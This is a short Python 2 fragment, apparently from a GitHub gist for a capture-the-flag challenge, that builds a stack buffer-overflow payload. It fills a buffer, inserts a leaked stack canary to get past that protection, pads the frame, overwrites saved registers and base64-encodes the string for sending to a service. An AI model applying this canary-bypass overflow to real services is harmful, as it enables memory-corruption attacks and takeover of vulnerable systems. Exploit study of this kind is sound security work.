| # Fill up the buffer | |
| crash_string = "a" * buffer_size | |
| # Append the first 4 bytes of the canary check (it's always 4) | |
| crash_string += canary[:4] | |
| # Pad out the rest of the string canary buffer | |
| crash_string += "a" * ((canary_frame.offset * - 1) - 4) | |
| # overwrite the saved registers | |
| crash_string += 'eeee' | |
| crash_string += '\n' | |
| # Send the crashing string to the service | |
| b64 = base64.b64encode(crash_string) | |
| print chal, canary, crash_string.strip(), b64 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment